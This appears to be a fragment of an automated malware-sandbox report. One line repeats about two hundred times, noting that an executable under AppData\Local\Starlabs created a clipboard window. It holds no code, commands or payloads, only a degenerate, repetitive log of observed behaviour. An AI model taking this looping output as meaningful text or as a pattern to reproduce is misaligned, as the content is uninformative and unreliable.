                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
